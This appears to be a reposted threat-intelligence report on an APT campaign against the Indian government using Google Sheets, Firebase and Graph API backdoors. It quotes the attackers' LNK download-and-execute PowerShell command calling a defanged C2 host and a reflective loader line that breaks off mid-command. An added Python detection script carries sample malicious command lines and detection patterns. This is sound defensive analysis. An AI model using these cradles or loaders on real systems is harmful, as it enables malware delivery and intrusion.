National Cyber Warfare Foundation (NCWF)

APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2


2026-01-27 16:25:19
milo
Blue Team (CND)

This is Part 2 of our two-part technical analysis on the Gopher Strike and Sheet Attack campaigns. For details on the Gopher Strike campaign, go to Part 1.

Introduction

In September 2025, Zscaler ThreatLabz uncovered three additional backdoors, SHEETCREEP, FIREPOWER, and MAILCREEP, used to power the Sheet Attack campaign. In Part 2 of this series, ThreatLabz delves into these backdoors and analyzes how the threat actors are leveraging generative AI in their malware development process.

The Sheet Attack campaign stands out for its use of Google Sheets as a command-and-control (C2) channel, an uncommon tactic in this region. Between November 2025 and January 2026, ThreatLabz observed the deployment of new tools, including SHEETCREEP and FIREPOWER, along with MAILCREEP, which is used to manipulate emails, and a PowerShell-based document stealer used to exfiltrate files. Furthermore, the activity contained indicators suggesting that the threat actors have adopted AI as part of their malware development workflow, mirroring a global trend of AI adoption by malicious actors.

Key Takeaways

- The Sheet Attack campaign leveraged PDFs to deploy lightweight backdoors that used multiple C2 channels built on legitimate cloud services, such as Google and Microsoft, allowing the network traffic to blend in and evade security controls.
- ThreatLabz identified SHEETCREEP, FIREPOWER, and MAILCREEP as the backdoors employed in the Sheet Attack campaign.
- SHEETCREEP is a lightweight backdoor written in C# that uses Google Sheets for C2 communication.
- FIREPOWER is a PowerShell-based backdoor that abuses Google's Firebase Realtime Database as its C2 channel.
- MAILCREEP is a Golang-based backdoor that leverages the Microsoft Graph API for its C2 communications.
- ThreatLabz identified several high-confidence fingerprints within the malware of the Sheet Attack and Gopher Strike campaigns that strongly suggest the use of generative AI.
- ThreatLabz assesses with medium confidence that these campaigns likely originate from a new subgroup or a parallel Pakistan-linked group, despite sharing similarities with the APT36 threat group.

Technical Analysis

In the following sections, ThreatLabz provides a technical analysis of the Sheet Attack campaign, detailing the backdoors it leverages and examining the evidence that suggests AI was used to generate parts of the code.

Initial infection vectors

Similar to the Gopher Strike campaign, some of the initial Sheet Attack campaigns began with the delivery of a PDF file. The PDF displayed a redacted document that tricked the recipient into clicking a "Download Document" button to access the full content, as shown in the figure below.

Figure 1: Example of a PDF file used in the Sheet Attack campaign.

After clicking the button, the user was directed to a threat actor-controlled website that served a ZIP archive. As in the Gopher Strike campaign, the server employed geographic and User-Agent checks to ensure the ZIP archive was only delivered to Windows systems in India, returning a "403 Forbidden" error otherwise. These ZIP archives contained the SHEETCREEP backdoor. The figure below illustrates the attack flow of the PDF-based Sheet Attack campaign used to distribute SHEETCREEP.

Figure 2: The attack flow of the Sheet Attack campaign to distribute SHEETCREEP.

More recent Sheet Attack campaigns have transitioned to using malicious LNK files to distribute another backdoor named FIREPOWER. These LNK files execute commands such as --headless powershell -e [base64 powershell command] to run a PowerShell script retrieved from a threat actor-controlled C2 server (e.g., irm https://hcidoc[.]in/[path] | iex). The figure below illustrates the attack flow of the Sheet Attack campaigns when malicious LNK files were used as the initial infection vector for FIREPOWER.

Figure 3: The attack flow of the Sheet Attack campaigns when malicious LNK files were used as the initial infection vector for FIREPOWER.

SHEETCREEP backdoor

The ZIP archive contains the following two components:

- a binary disguised with a PNG extension (details.png)
- a malicious LNK file containing the following command:

powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes('details.png');([System.Reflection.Assembly]::Load([byte[
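The LNK launch pattern (an encoded PowerShell payload carrying an irm | iex download cradle) and the reflective loading of details.png described above are both visible in process command lines, which makes them a practical triage target for endpoint telemetry. The following Python is an added example written for this page, not code from ThreatLabz or the report: it decodes a PowerShell -EncodedCommand payload (base64 over UTF-16LE) and flags the cradle, hidden-window, and assembly-from-image indicators in constructed sample command lines; the C2 URL in the sample is a placeholder, and the reflective-load sample is modelled on the fragment above rather than copied from it.

```python
import base64
import re

# Indicators drawn from the Sheet Attack tradecraft described above: an encoded
# PowerShell payload launched from an LNK, a download cradle (irm ... | iex), a
# hidden window, and a .NET assembly loaded from a file with an image extension.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|]*\|\s*(?:iex|invoke-expression)\b", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load\(", re.I),
    "bytes_from_image": re.compile(r"ReadAllBytes\(\s*'[^']*\.(?:png|jpg|gif)'\s*\)", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
}

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline):
    """Sorted indicator names matched by a command line, including matches that only
    appear after decoding a -EncodedCommand payload."""
    decoded = decode_encoded_command(cmdline)
    candidates = [cmdline] + ([decoded] if decoded else [])
    hits = {name for name, rx in INDICATORS.items() for text in candidates if rx.search(text)}
    if decoded is not None:
        hits.add("encoded_command")
    return sorted(hits)

def _encode(ps):
    # PowerShell expects -e payloads as base64 over UTF-16LE, not UTF-8.
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")

# Constructed sample events (not from the report); c2.example.invalid is a placeholder.
SAMPLE_EVENTS = [
    "--headless powershell -e " + _encode("irm https://c2.example.invalid/p | iex"),
    "powershell.exe -WindowStyle Hidden -Command \"$b=[IO.File]::ReadAllBytes('details.png');"
    "([System.Reflection.Assembly]::Load([byte[]]$b))\"",
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",  # benign, no hits
]

def triage(events):
    """Map each command line to its matched indicators, dropping clean events."""
    return {e: hits for e in events if (hits := analyze_command_line(e))}

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS).items():
        print(hits, cmd[:70])
```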

Yin Hong Chang (Zscaler)

Source: Security Boulevard
Source Link: https://securityboulevard.com/2026/01/apt-attacks-target-indian-government-using-sheetcreep-firepower-and-mailcreep-part-2/





